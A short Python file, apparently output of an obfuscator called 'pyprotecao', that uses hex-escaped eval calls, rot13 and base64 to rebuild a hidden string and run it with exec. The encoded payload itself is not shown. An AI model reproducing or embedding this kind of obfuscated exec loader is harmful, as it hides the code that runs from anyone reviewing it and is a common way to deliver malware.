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encoded by pyprotecao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http://keltecmp.tk/pyprotecao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base64, codecs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= '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= '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= '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 = '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 = '\x72\x6f\x74\x31\x33'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 = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')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eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'&lt;string&gt;','exec'))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